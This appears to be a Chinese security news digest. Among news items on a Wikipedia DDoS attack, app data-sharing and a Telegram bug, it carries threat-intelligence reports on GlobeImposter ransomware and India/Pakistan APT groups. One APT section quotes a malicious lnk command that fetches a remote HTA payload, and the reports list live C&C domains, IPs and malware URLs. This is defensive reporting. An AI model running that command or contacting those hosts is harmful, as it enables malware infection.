安全快讯Top News

在维基百科遭遇 DDoS 攻击后 维基媒体宣布获 250 万美元资金支持

据外媒报道,上周五,维基百科在遭遇恶意DDOS攻击后在数个国家下线。维基媒体基金会之后证实了这一事件并开始着手调查。很快,维基百科在这些国家恢复正常。不过几日后该非营利组织仍未就这起网络攻击事件是否已经得到彻底解决做出证实。 现在,维基媒体宣布克雷格·纽马克慈善基金会(Craig Newmark Philanthropies)获得了250万美元的资金支持,这在时间点上是一个相当有趣的举动。据悉,这笔来自Craigslist创始人基金会的捐款则是为了帮助维基媒体保护其项目和志愿者免受网络威胁。 维基媒体基金会安全主管John Bennett就这笔投资的必要性发表了以下言论:“维基百科拥有数亿用户的十大网站的持续成功使其成为了破坏、黑客攻击和其他网络安全威胁的目标,这些威胁损害到了自由知识运动和社区。这就是为什么我们在问题出现之前就积极地与之斗争。这笔投资将使我们能进一步扩大我们的安全计划进而识别当前和未来的威胁、制定有效的对策,并改善我们的整体安全控制。” 这项慈善投资将有助于提供对该组织服务包括维基百科的安全访问。另外,该非营利组织还指出,这笔捐款可以更好地缓解上周发生的袭击事件。   (稿源:cnBeta,封面源自网络。)

GlobeImposter 攻破某域控制器,局域网内横向扩散致企业损失惨重

感谢腾讯御见威胁情报中心来稿! 原文: https://mp.weixin.qq.com/s/M7tUw8E_qsqK7HxMyxS7Yw   一、事件回顾 近日,腾讯安全御见威胁情报中心接到某企业求助,称其局域网内8台服务器遭受勒索病毒攻击。工程师现场勘察后,确认该事件为GlobeImposter勒索病毒通过外网爆破入侵该公司域控服务器,随后利用该机器作为跳板机,登录到该公司内其它机器再次进行勒索加密。 黑客入侵示意图 腾讯安全专家通过排查被攻击公司的染毒机器,可知该公司染毒的第一台服务器为域管理服务器,该机器由于开启了远程桌面且由于其IP地址暴露在外网从而被爆破入侵。 由于该服务器为该公司的域控制器,被入侵控制之后出现灾难性后果:攻击者可任意登录局域网内其它机器,通常情况下,域管理员具备登录域内所有计算机的权限。攻击者控制域控制器之后,就有能力在任意一台计算机运行任意程序,可能导致企业大量机密信息泄露。本例中,攻击者选择其中8台电脑实施勒索病毒加密攻击,灾情进一步被放大,使企业遭受惨重损失。 同时在被攻击机器上找到了安全软件对抗工具ProcessHacker,黑客通常使用该工具与机器上的安全软件做对抗。 内网嗅探扫描工具,黑客可通过该类工具快速获取当前局域网内其他活动机器尝试攻击 密码抓取工具,使用该类工具,黑客可获取本地机器相关口令,作为内网横向传播过程中的弱口令使用。由于部分企业内网安全措施薄弱,多台服务器使用同一密码,此类攻击手法通常也简单直接且有效。 还有病毒运行后的留下的相关日志文件,疑似病毒的副本文件 观察后可知受害电脑已感染GlobeImposter-865系列病毒 GlobeImposter该系列病毒版本加密文件后会添加.主神865扩展后缀,同时留下名为HOW TO BACK YOUR FILES.exe的勒索说明程序 由于GlobeImposter通常使用RDP爆破入侵加密企业服务器,所以当加密文件完成后,该病毒除删除系统卷影外,还会清除其注册表中的RDP连接信息,同时加密前会结束大量的数据库相关服务进程,防止其造成的文件占用无法加密。 病毒加密时使用以下白名单关键词做过滤 windows bootmgr temp pagefile.sys boot ids.txt ntuser.dat perflogs MSBuild 同时会优先加密大量文件类型,主要为数据价值较高的文件类型 包括以下数十种文件格式均被加密: bak、ba_、dbb、vmdk、rar、zip、tgz、vbox、vdi、vhd、vhdx、avhd、db、db2、db3、dbf、mdf、mdb、sql、sqlite、sqlite3、sqlitedb、xml、$er、4dd、4dl、^^^、abs、abx、accdb、accdc、accde、accdr、accdt、accdw、accft、adb、adb、ade、adf、adn、adp、alf、ask、btr、cat、cdb、ckp、cma、cpd、dacpac、dad、dadiagrams、daschema、db-journal、db-shm、db-wal、dbc、dbs、dbt、dbv、dbx、dcb、dct、dcx、ddl、dlis、dp1、dqy、dsk、dsn、dtsx、dxl、eco、ecx、edb、epim、fcd、fdb、fic、flexolibrary、fm5、fmp、fmp12、fmpsl、fol、fp3、fp4、fp5、fp7、fpt、frm、gdb、gdb、grdb、gwi、hdb、his、ib、idb、ihx、itdb、itw、jet、jtx、kdb、kexi、kexic、kexis、lgc、lwx、maf、maq、mar、marshal、mas、mav、maw、mdbhtml、mdn、mdt、mfd、mpdmrg、mud、mwb、myd、ndf、nnt、nrmlib、ns2、ns3、ns4、nsf、nv、nv2、nwdb、nyf、odb、odb、oqy、ora、orx、owc、p96、p97、pan、pdb、pdm、pnz、qry、qvd、rbf、rctd、rod、rodx、rpd、rsd、sas7bdat、sbf、scx、sdb、sdc、sdf、sis、spq、te、teacher、tmd、tps、trc、trc、trm、udb、udl、usr、v12、vis、vpd、vvv、wdb、wmdb、wrk、xdb、xld、xmlff 二、关于GlobeImposter勒索病毒家族 GlobeImposter出现于2017年中,加密文件完成后会留下名为HOW TO BACK YOUR FILES.(txt html exe)类型的勒索说明文件。该病毒加密扩展后缀繁多,其规模使用且感染泛滥的类型有12生肖4444,12主神666,以及现在较多的12主神865等系列。由于该病毒出现至今仍然无有效的解密工具,因此我们提醒各政企机构提高警惕。 GloeImposter泛滥使用后缀(不局限于以下类型): 4444系列: .ox4444 .help4444 .all4444 .china4444 .monkey4444 .snake4444 .Rat4444 .Tiger4444 .Rabbit4444 .Dragon4444 .Horse4444 .Goat4444 .Rooster4444 .Dog4444 .Pig4444 666系列: .Zeus666 .Hera666 .Poseidon666 .Hades666 .Hestia666 .Ares666 .Athene666 .Hermes666 .Hephaestus666 .Apollo666 .Aphrodite666 .Artemis666 865系列: .Zeus865 .Hera865 .Poseidon865 .Hades865 .Hestia865 .Ares865 .Athene865 .Hermes865 .Hephaestus865 .Apollo865 .Aphrodite865 .Artemis865 观察近期GolbeImposter感染趋势可知,该病毒虽然在月中有感染下降,但观察其整体波峰,可得其整体趋势依然呈间歇性上涨。通过观察其感染行业分布,也可知该病毒在国内也从早期的广撒网模式,改变为现在主要针对数据价值较高行业的服务器实施攻击,从而提升其勒索赎金成功率。 三、安全建议 企业用户: 重点防御措施 1.针对该勒索病毒主要通过RDP(远程桌面服务)爆破攻击的特点,建议企业立即修改远程桌面连接使用弱口令,复杂口令可以减少服务器被黑客爆破成功的机会。管理员应对远程桌面服务使用的IP地址进行必要限制,或修改默认的3389端口为自定义,配置防火墙策略,阻止攻击者IP连接。 2.建议企业网管配置相应的域安全策略,通过修改计算机组策略,配置帐户锁定策略,限制登录失败次数,默认为不受限,我们可以将其限制为3-10以内。 操作步骤: 运行,gpedit.msc,打开组策略编辑器,在计算机设置->安全设置->帐户策略->帐户锁定策略,将帐户锁定的阈值,设定的稍小一些。 3.服务器使用腾讯御点终端安全管理系统或腾讯电脑管家拦截病毒,并启用文档守护者功能备份重要文档。 4.企业用户可以使用腾讯御界高级威胁检测系统,腾讯御界高级威胁检测系统可以及时检测发现黑客针对内网的爆破攻击活动,可以及时提醒网管注意。 5. 已经感染勒索病毒的用户,请参考(https://s.tencent.com/ls/ )页面上勒索病毒应急手册进行处置。 通用的安全措施 防止入侵者爆破成功之后在内网横向扩散: 1.建议企业内网关闭不必要的网络端口,降低黑客在内网攻击传播的成功率。如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆。 2、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问。 3、采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理。同样,强密码策略也可以通过域安全策略来统一配置强制全网执行。 4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。 5、对重要文件和数据(数据库等数据)进行定期非本地备份。 6、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。 7、建议全网安装御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 个人用户: 1、启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码。 2、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。 IOCs MD5: a7d182ac1e20754e3881f7471954fcd4 参考链接: 全面防御勒索病毒 https://s.tencent.com/ls/

印巴战争阴影下的网络战——近期印巴 APT 组织攻击活动汇总

感谢腾讯御见威胁情报中心来稿! 原文: https://mp.weixin.qq.com/s/pJ-rnzB7VMZ0feM2X0ZrHA   一、背景 印度和巴基斯坦同属于南亚地区的两个国家,但是由于一些历史原因,两国关系一直不大和睦,冲突不断。从2019年初开始,双方关系突然紧张,冲突升级。今年2月,印度空军飞越克什米尔巴方实控线,被巴军方击落并俘获一名印度空军飞行员,同时这也是印度首次袭击巴基斯坦境内。两国在克什米尔印军队集结并且频繁交火,印方甚至水淹巴基斯坦,打开阿尔奇大坝,造成巴基斯坦面临洪水的危机,同时印方几日前公开宣称,可能会先对巴基斯坦使用核武措施。 随着双方的军事冲突愈演愈烈时,网络战场上也硝烟四起。就在印度空军被俘事件后,腾讯安全御见威胁情报中心曾捕获并发布了一例以此次冲突事件为诱饵的APT攻击样本,分析后确认了该样本源于巴基斯坦的APT攻击组织TransparentTribe(见参考文章1),此外印度针对巴基斯坦的攻击活动也一直在持续中,腾讯安全御见威胁情报中心也曾多次发布相关的分析报告(见参考文章2、3) 网络战被认为是地缘政治的延伸,甚至是战争和冲突的一部分。APT攻击做为网络战中的重要攻击活动,其活跃趋势跟地缘政治等全球热点问题密切相关,全球APT攻击高发区域也是全球地缘政治冲突的敏感地域。纵观2019年活跃的网络攻击活动,无一不是政治局势复杂和敏感的地域,包括朝鲜半岛、委内瑞拉、中东等等。网络战已成为国家间政治博弈甚至是现代战争的重要组成部分。 回到印巴冲突中,腾讯安全御见情报威胁中心捕获到大量关于印巴网络攻击的恶意样本。经过深度分析和跟踪溯源,我们归类出较为活跃的几个APT组织,包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot,TransparentTribe等。同时在分析溯源的过程中,我们还发现APT组织之间相互伪装,试图来混淆安全人员分析,躲避追踪。本文为对该些活动和组织的一些总结,可能会存在一定的疏漏,还请业内同行再作补充。 二、疑似来自印度的攻击 印方在对巴基斯坦的网络攻击活动中,一直处于强势和主导的地步,还涉及到跟印度相关的APT攻击组织也相对较多,较有代表性的包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot等。 1、SideWinder(响尾蛇) 组织概况 SideWinder(响尾蛇)是腾讯安全御见情报威胁中心最早在2018年披露的APT攻击组织,得名由来为该组织的背景跟卡巴斯基在2018年第一季度报告中提到的SideWinder组织非常的相似,虽然卡巴斯基并未发布任何该组织的技术细节和报告。即便如此,我们还是继续沿用卡巴斯基的命名,命名该组织为”响尾蛇”。 该组织的最早的攻击活动可以追溯到 2012 年。在2019年2月,腾讯安全御见情报威胁中心再次详细的披露过该组织在2018年下半年的一些攻击活动。此外,国内有多个安全公司也同时披露过该组织的其他的一些攻击活动。 攻击目标 主要为巴基斯坦政府部门(如内阁部门)、巴基斯坦军方、军事目标等 技术手段 SideWinder(响尾蛇)主要采用鱼叉攻击的方式,投递带有漏洞的office文档或者包含恶意lnk的压缩包文件,受害者打开office文档或者恶意lnk文件后会下载执行hta文件,通过执行hta脚本进一步下载后门RAT。 如某次攻击的钓鱼邮件:   如某次攻击的诱饵: 压缩包解压后为一个恶意的lnk文件: 执行命令: %windir%\system32\mshtb.exe http://www.download.fbr.gov.pk.cdn-ps.net/images/5DC7A431/11991/5183/fad436c7/60b9f1d 执行的脚本后,除了收集本地杀软信息外,还会解密诱饵pdf文件内容并且打开,随着继续下载下一阶段的hta脚本。 打开的诱饵pdf内容为: hta脚本为最终会使用一个白加黑技术,来执行最终的后门文件SystemApp.dll,该后门用来进行信息的收集,包括系统信息、文件信息等。 白加黑文件: 后门内容: 此外,其他的攻击中,该组织还会使用VB的RAT,如: 组织小节 2、BITTER(蔓灵花) & Patchwork(白象)& White Company & Confucius(孔子) 组织概况 之所以把这几个组织放在一起,是因为我们相信,该四个组织之间都存在一定的关联,甚至为同一组织或同一组织分化出来的不同的小组。如BITTER(蔓灵花)跟Patchwork(白象)和还有Confucius(孔子),我们不止一次的在我们的分析报告中指出存在包括武器库、基础设施等的共用的证据,如《蔓灵花(BITTER)APT组织针对中国境内政府、军工、核能等敏感机构的最新攻击活动报告》等。 其中,蔓灵花最早在2016由美国安全公司Forcepoint进行了披露,并且命名为“BITTER”,得名由来为早期的特马的数据包中都包含字符“BITTER”做为标识,因此得名。同年国内友商360也跟进发布了分析报告,命名为“蔓灵花”。当然该组织除了针对巴基斯坦进行攻击外,也在频繁的针对中国大陆的目标进行攻击活动。 白象组织,也叫摩诃草、Patchwork、HangOver,该最早可以追溯到2009年11月,至今还非常活跃。同样该组织除了针对巴基斯坦进行攻击外,也在频繁的针对中国大陆的目标进行攻击活动。 White Company为2018年由cylance公司披露的APT组织,虽然该公司的报告中未明确指出该组织的背景,但是从我们的分析发现,该组织同样来自印度,并且我们也进一步发现,该组织的武器库和白象相重叠。 Confucius(孔子)为Palo Alto Networks Unit 42在2016年发现针对南亚特定人群的威胁组织。该组织在恶意代码和基础设施上与白象和蔓灵花均存在重叠,但目标稍有不同。   攻击目标 技术手段 这几个组织都习惯使用鱼叉攻击的方式,投递含有漏洞或宏的office文档、带有漏洞的InPage文件、自解压文件等。 如蔓灵花的诱饵文档: 如白象的诱饵: 如Confucius(孔子)的诱饵: 而执行诱饵文档后,最终的武器库也略有不同。如蔓灵花: 蔓灵花第一阶段木马一般都为一个downloader,除了下载第二阶段的相关木马外,还会收集用户的相关信息,如上报信息: “?a=administ-b24c70&b=ADMINIST-B24C70&c=Microsoft%20Windows%20XP&d=AdministratorAdministrator3fb4c154-b52a-4667-8a49-4fbe422781b5365536040965860&e=” 上报内容包括主机名、计算机名、操作系统名、用户名等。 而第二阶段为下发相应的插件,插件内容包括添加开机启动、键盘记录、最终的远控木马等。 此外,蔓灵花还存在一些使用习惯,如文件目录习惯使用new_downloader_xxx: 而下载地址习惯使用healthne: 如白象: 今年最常使用的特马为名为badnews的特马,使用github和feed43等公用平台用来分发C&C: 特马功能 组织关系 我们之前的文章已经多次指出了BITTER、白象、Confucius之间的关系,本文着重描述下白象跟White Company之间的关系。 如我们从确定白象的某个样本中(97187e5e8b9a752b5f6377df3bea17b5),发现了样本中包含了提权漏洞CVE-2016-7255的模块: 把该模块dump下来后,根据模块的特征我们进行搜索,发现了某篇文章中: 跟文章中的代码完全相似(https://www.alienvault.com/blogs/labs-research/off-the-shelf-rats-targeting-pakistan): 而我们对该漏洞的所有公开利用的代码经过搜寻,以及对该模块的特征进行搜索,均未在其他的攻击活动中发现跟该模块匹配的利用代码和代码结构,因此我们判断该特权利用模块为该组织特有,而该文章曝光的活动的组织跟白象为同一个或者能通用武器库的攻击小组。 而继续对该文章中披露的组织进行研究,我们发现该攻击组织就位cylance曝光的White Company: 组织小节 3、Donot Team 组织概况 Donot Team是2018年被曝光的APT攻击组织,最早在2018年3月由NetScout公司的ASERT团队进行了披露,随后国内的厂商奇安信也进行了披露。 该组织的得来自某攻击文件中的pdb中含有donot目录(如样本59733668b3ad8056ffd4c5c9db876cbc,pdb为:C:\Users\donot\Documents\Visual Studio 2010\Projects\downloader\Debug\downloader.pdb),因此取名为Donot Team,国内的安全厂商奇安信通过音译命名为肚脑虫,我们继续沿用该命名。该组织主要针对巴基斯坦进行攻击活动。 攻击目标 巴基斯坦政府部门、巴基斯坦军方、金融机构、外贸人士等 技术手段 Donot Team通常会投递带有恶意宏的office文档文件,文档名和文档内容都具有很强的针对性。 如使用巴基斯坦空军的诱饵: 如伪装巴基斯坦国家银行Excel计算器: 当受害者打开office恶意样本后,会提示执行宏代码,点击执行后会释放包含脚本和后门程序的压缩包,然后解压执行脚本,脚本最终会启动后门木马。 相关宏代码: 释放的压缩包: 执行脚本代码: 最终执行的恶意文件,会根据返回的Content-Typel来进行下一步行为: 1)当返回的为application时则会将返回的包解码exe后存储到  %userprofile%\\DriveData\\Files\\目录下。 2)当返回的是cmdline时,则会执行%userprofile%\\DriveData\\Files\\wuaupdt.exe 3)当返回的是batcmd的时,则会执行%userprofile%\\DriveData\\Files\\test.bat 4)除了windows上的攻击外,Donot Team还拥有移动端的攻击能力。如使用安卓特马StealJob的攻击流程(来源奇安信博客分析,见参考文章4): 相关功能 组织小节   三、疑似来自巴基斯坦的攻击 巴方在对印度的网络攻击活动中,一直处于弱势和挨打的地位,目前发现的相关的APT攻击组织也相对较少,较有代表性的是TransparentTribe。 组织概况 TransparentTribe APT组织,又称ProjectM、C-Major,该组织的活动最早可以追溯到2012年。该组织的相关活动在2016年3月被proofpoint披露,趋势科技随后也跟进进行了相关活动的披露。 腾讯安全御见威胁情报中心曾在上半年曝光过该组织的相关攻击活动《TransparentTribe APT组织2019年针对印度政府、军事目标的攻击活动报告》。 攻击目标 印度政府、印度军方、军事研究机构等。 技术手段 TransparentTribe通常投递带有恶意宏的office文档,诱饵文档内容多与政府、军事相关,当受害者打开恶意文档后,会提示执行宏代码,一般点击执行后诱饵内容才会显示出来。 如跟印度陆战研究中心(CLAWS)相关诱饵: 如跟印度国防学院(NDC)相关诱饵: 宏代码执行后会释放一个压缩包文件,并解压出包含的木马后门执行: 在后门使用上,该组织依旧使用CrimsonRAT、.net loader、.net droper、PeppyRAT 相关特马: 而经过腾讯安全御见威胁情报中心的数据溯源,该组织疑似跟巴基斯坦另外一个组织Gorgon Group有一定的关联: 组织小节   四、存在的假旗(false flag) 在印巴双方网络战持续不断时,其中Donot Team和TransparentTribe 两个APT组织引起我们格外的注意,经过详细分析后发现两个疑似敌对组织不断的互相模仿,影响安全研究人员对其追踪溯源。 例如Donot样本宏代码和TransparentTribe样本宏代码高度相似,可以看到Donot宏代码注释的地方,注释的这段代码是要执行的exe路径,但是Donot实际上执行的是bat脚本,我们再对比下TransparentTribe就能发现,TransparentTribe才是执行exe的。并且Donot样本中这段被注释的代码与TransparentTribe样本中的一致(左边Donot,右边TransparentTribe): 并且部分代码函数都是一模一样的,函数命名和常量值(左边Donot,右边TransparentTribe): 甚至在某些样本中两个APT组织释放的木马名称都完全一样(左边Donot,右边TransparentTribe): 我们相信,印巴双方的组织还会继续模仿下去,这势必给安全研究人员在定性上产生更多的干扰。   五、总结 从上文可以看到,由于印巴两国的长期以来的紧张关系,网络攻击一直都没停止过。即便两国的活动多次被安全公司所曝光,但是各自国家的组织完全没停止攻击的意思,相反是越来越猛烈。2019年对印巴两国来说,是个不平静的一年,双边的局势冲突不断,网络战也一浪高过一浪。我们相信,这种网络抗衡会持续进行下去。 没有网络安全就没有国家安全,随着政治局势的恶化,网络战势必会愈演愈烈。虽然我们处于和平年代,但是我们的相关部门和单位切记要提高警惕,保障重点部门和单位的网络安全。   六、安全建议 针对重要政府机构、重点企业、科研单位的APT攻击,已经成为网络战背景下的日常偷袭活动,攻击者平时以刺探情报、入侵渗透为主,一旦冲突加剧,随时可能提升攻击破坏的烈度。腾讯安全专家建议相关敏感单位加强网络信息系统安全管理,加强对员工的安全意识教育,防患于未然。可参考以下几点建议: 1、建议不要打开不明来源的邮件附件;除非非常清楚文档来源可靠,否则建议不要启用Office执行宏代码; 2、及时安装系统补丁和重要软件的补丁; 3、使用杀毒软件防御可能的病毒木马攻击,建议全网安装御点终端安全管理系统 (https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 4、使用腾讯御界高级威胁检测系统,及时发现APT攻击的蛛丝马迹。腾讯御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。更多信息可参考官方网站(https://s.tencent.com/product/yujie/index.html)   IOCs MD5: 050dd090b5af80fb73b2d6e6c8a3adc9 d78d30c43bdd0251fce773376a2eca24 4d59b084df25e9c6cba6343b753077b3 86938e9ed38f59630ee2318ad5a91f30 7b6fb1c1cf09cb371f8a22ac3c19da10 f64125c34cb209c71ca137513bf9714b 35a9d47a8b6d0fab0a8bfdf1b1381486 9eb7cbd46aa2aa624ae13acb64394b1c 6d3e9283b52086a406358ca914e23837 afffa7af5e795f911434b6e7016fc6e5 3c06cbcb6bb57b688ca30659c6c031a5 e9c8d0d4c74d53566b446e1242947e15 23b4dbbe5f3a44798312c1fd66117221 42b713a261d61c5c00b7704ae1f4b912 561adc55d8a9bf9d6966f7dd234d1e20 a66aa5eb35c67f685cc425c1d04d0f5f cf665bbf0c208e5eb29ad99f9154bf3e a6270064f1630cdf5bcda858762db516 7f99acb32db8b99fbe9347d3e69e9063 0a3a423d5cd7628efcc12cdbce378edf 0108a194e11a2d871f5571108087c05d f7d2b9541d9035d31c637d39d88d18a7 08a8db28207fa13ebb25cf0064d12f17 9c6999f6b2415761fa85d6391dfb4628 f5a5f7af4e46e89e9f2a84cc293f1250 0fa9b24535f55ec64be0f02a75d637b3 43a2dad49d410b143b8a26772d6e71dd 159890b8b9e66cc8138d332d860ddd96 4d401db3dc6172e7b16bcbe7d87fc526 02ba9703d1f250b411ea4c868d17fd2e db5193d53f7bb509928304ad8326f359 8d8822326f53982b141dc0e7f6cf948a 91e5c5afcf42f8912d5ae3b7dafcda22 96e351e7faf7197677e58a1f6390b0f0 babca0f4ccca5c46f6145580a92284f9 427d28ebedbe8b2b730de1d34435dcb8 URL: https://trans-pre.net/ini/sJDts1oInx8fbn0ffcxa3R6L82v5k8Ali9eiPb78/11991/5183/be30afa8 http://www.download.fbr.gov.pk.cdn-ps.net/plugins/11991/5183/true/true/ http://www.download.fbr.gov.pk.cdn-ps.net/cgi/8ee4d36866/11991/5183/aca094d0/file.hta http://www.download.fbr.gov.pk.cdn-ps.net/images/5DC7A431/11991/5183/fad436c7/60b9f1d http://www.cdn-ps.net/plugins/-1/9373/true/true/ http://www.cdn-ps.net/cgi/8ee4d36866/-1/9373/34f1d81f/file.hta https://transpre.net/ini/NrveX8Yi7Mgr06nqM86Wba9uW8LdbbJ2HAaB9zWG/-1/9373/8a7b946c C&C: 185.99.133.27 data-backup.online unique.fontsupdate.com servicejobs.life 212.32.226.244 111.115.60.18 ezeescan.com 95.168.176.141   参考资料 1)TransparentTribe APT组织2019年针对印度政府、军事目标的攻击活动报告https://s.tencent.com/research/report/669.html 2)响尾蛇(SideWinder)APT组织针对南亚的攻击活动披露https://s.tencent.com/research/report/659.html 3)疑似白象组织针对巴基斯坦、孟加拉国等南亚国家的最新攻击活动报告https://s.tencent.com/research/report/711.html 4)肚脑虫团伙利用新特种安卓木马StealJob的攻击分析https://ti.qianxin.com/blog/articles/stealjob-new-android-malware-used-by-donot-apt-group/ 5)https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf 6)针对巴基斯坦的RAT https://www.alienvault.com/blogs/labs-research/off-the-shelf-rats-targeting-pakistan

为调查非法武器 美政府令苹果谷歌提交万名用户数据

北京时间9月10日上午消息,据福布斯杂志网站报道,最近,美国政府希望苹果和谷歌提交使用枪支相关应用的用户数据,包括姓名、电话号码和其他身份识别数据。涉及的用户数量至少有1万名。 这样的举措前所未有:美国调查人员从未在任何一个案件中,要求苹果和谷歌提价及单个应用的用户个人信息;也从未公开任何一项命令,允许联邦政府要求硅谷巨头一次提交近万人的个人信息。 根据司法部(DOJ)在9月5日提交的法院命令申请,调查人员希望获取有关Obsidian 4应用上的用户信息。Obsidian 4是一个用来控制American Technologies Network Corp(ATN)制造的步枪瞄准器的工具。该应用允许枪支持有人从Android或iPhone设备上获取直播、录制视频并校准枪支瞄准器。Google Play上的Obsidian 4的信息页显示,该应用下载量已超过1万次。苹果未提供下载数据,因此我们尚不清楚有多少iPhone用户受此次政府新措施的影响。 隐私活动人士提醒称,若法院批准该请求,且苹果和谷歌也决定予以配合的话,数千名与犯罪无关的用户的个人数据将被调查。隐私国家的国家监督计划负责人埃丁·奥曼诺维奇(Edin Omanovic)表示,这将开创一个危险的先例,并擭取“大量无辜用户的个人数据”。 “这样的命令应该仅针对嫌疑犯且是具体化的——但这个命令两项都不符合,”奥曼诺维奇说。 截至文章发布时,苹果与谷歌均尚未回复评论请求。瞄准器制造商ATN也未予以回复。美国司法部也未回复评论请求。 美国移民与海关执法局(ICE)希望获得这些数据,来广泛调查可能的违反武器出口规定的行为。ICE目前正在调查ATN瞄准器的非法出口,但公司本身未接受调查。因此,调查人员希望找到一种快速的方法,确定应用使用的位置,因为这个信息很有可能暗示硬件被发往哪个位置。ICE调查的对象目前仍是个谜团,因为至今不管是ATN公司还是武器工具零售商都未曾被公诉。 若法院签发该命令,苹果和谷歌将需要提交从2017年8月1日起到目前为止下载过该瞄准器应用的用户姓名,电话号码和IP地址等等。 这一要求牵涉广泛,不仅是可能非法获得枪支的海外用户,包括美国境内使用该应用的用户也会被卷入调查。 尽管这项命令在美国前所未有,但非美国政府之前已尝试过类似的策略。福布斯此前报道过,曾有一政府要求苹果提交一个相关应用的5800万名用户的数据,以跟踪一个恐怖分子的基层组织。但苹果拒绝了提交数据的请求。   (稿源:新浪科技,封面源自网络。)

拥有上百万名用户的月经追踪应用被指将敏感数据分享给 Facebook

据外媒报道,一项新的研究发现,经期追踪应用正在向Facebook发送有关女性健康和性行为的敏感个人信息。总部位于英国的倡导组织Privacy International跟外媒BuzzFeed News分享了这一调查结果。 该组织发现,包括MIA Fem、Maya在内的数款月经跟踪应用会将女性避孕措施的使用情况、月经周期、腹部绞痛等症状等信息直接发送到Facebook上。 女性使用这类应用的目的多种多样,从跟踪月经周期到最大化怀上孩子的几率等等。在Google Play应用商城中,由印度Plackal Tech公司持有的Maya拥有超500万的下载量。塞浦路斯的Mobapp开发有限公司旗下的月经追踪软件MIA Fem: Ovulation Calculator表示,该公司在全球拥有200多万名用户。 据了解,这些应用跟Facebook的数据共享则是通过Facebook的软件开发工具包(SDK)实现。该SDK可以帮助应用开发人员整合特定功能并收集用户数据,这样Facebook就可以向他们展示有针对性的广告和其他功能。当用户将个人信息放入到应用时,这些信息就有可能由SDK发送给Facebook。 当被问及该报道时,Facebook告诉BuzzFeed News,它已经跟Privacy International指明的应用取得了联系并就可能违反其服务条款的行为展开讨论。 Privacy International发现,只要Maya用户打开应用,该应用就会通知Facebook甚至在用户同意应用隐私政策之前就开始将数据分享给Facebook。 分析发现,该应用还会分享用户输入的关于避孕使用情况的数据以及她们的情绪。另外,应用还会要求用户输入有关他们何时发生过性行为以及使用了何种避孕措施的信息。同样的,这些信息也被分享给了Facebook。 通常情况下,广告商对人们的情绪非常感兴趣,因为这有助于他们在更有可能购买的时候有策略地针对他们投放广告。怀孕或想要怀孕的女性可能就会改变她们的购物习惯。   (稿源:cnBeta,封面源自网络。)

维基百科遭遇 DDoS 攻击,NCSC 提醒其他公司加强防范

在维基百科遭遇 DDoS 攻击并停运后,NCSC(英国国家网络安全中心)敦促其他组织对 DoS 攻击组织采取应对措施。 根据维基媒体德国公司(Wikimedia Deutschland),大规模 DDoS 攻击导致维基百科的大多数服务器瘫痪,美国,欧洲,英国和中东地区的用户在 9 月 6 日和 9 月 7 日期间无法进入维基百科网站。 根据非政府组织 NetBlocks,维基百科的网站大约停机了 9 个小时,其中 DDoS 攻击的目标是美国和欧洲的维基媒体基础设施。   恢复正常运行 “今天,维基百科遭遇恶意攻击,导致部分国家的用户在相当一段时间内无法访问我们的网站。”  维基百科的非营利性基金会发表推特称,“攻击仍在持续。为了使用户可以正常访问我们的网站,我们的团队正在努力阻止攻击。” “在遭遇此次攻击后,维基媒体社区和维基媒体基金会已经创建了专门的系统和员工来定期监控和解决风险。我们会从问题中吸取经验,并且提高防范能力。” 维基媒体基金会称。 NSCC强调,为了更好地应对 DoS 攻击,企业应将其运行模式设置为可扩展的,以便在大量流量涌入网站时,基础设施可以自动核算并分配更多资源来容纳这些流量。   消息来源:BleepingComputer, 译者:xyj,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Telegram 在修复隐私漏洞后发布新版本

Telegram 最新发布的客户端版本为 5.11,该版本修复了一个严重的隐私漏洞。由于此应用在 Google Play 商店的下载量超过1亿次,这将会是一起严重的隐私侵权事故。 Telegram 在 3 月发布了一项新功能,允许发件人删除已发送的邮件,同时将其从收件人的设备中删除。这项功能旨在保护发件人的隐私,适用于不小心发送或者想要撤回消息的情况。 在研究 Telegram 的 MTProto 协议时,安全研究员 Dhiraj Mishra 发现了与消息删除功能相关的错误。 他注意到,当发件人从 Telegram 中删除了一条消息,图像或文件时,它将从当前会话中删除,但不会从设备本地删除。对于Android用户,这将允许收件人在`/ Telegram / Telegram Images / `路径下查看已删除的媒体。 此错误不仅发生在单人会话中,还涉及到了 Telegram 超级组。如果用户在组内误发了一个文件并撤回,这样看似自己的隐私得到了保护,但其实组内所有成员都可以从其设备的文件系统访问该文件。 “假设你是一个 2,000,00 人的小组中的一员,你不小心分享了一个媒体文件,并且想要通过‘对所有人撤回’功能来删除它。”Mishra 在他的文章中说,“但是这个方法有漏洞,所以你的文件仍然存在于所有用户的存储中。” 在报告错误后,Telegram 奖励了Mishra 2,500 欧元。此错误已在 5.11 版本中修复,该版本今天针对 Android 和 iOS 发布。 用户可以通过安装此更新来修复该错误,但 Mishra 告诉我们,收件人仍然可以查看到在旧版本中未正确删除的媒体。     消息来源:BleepingComputer, 译者:xyj,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

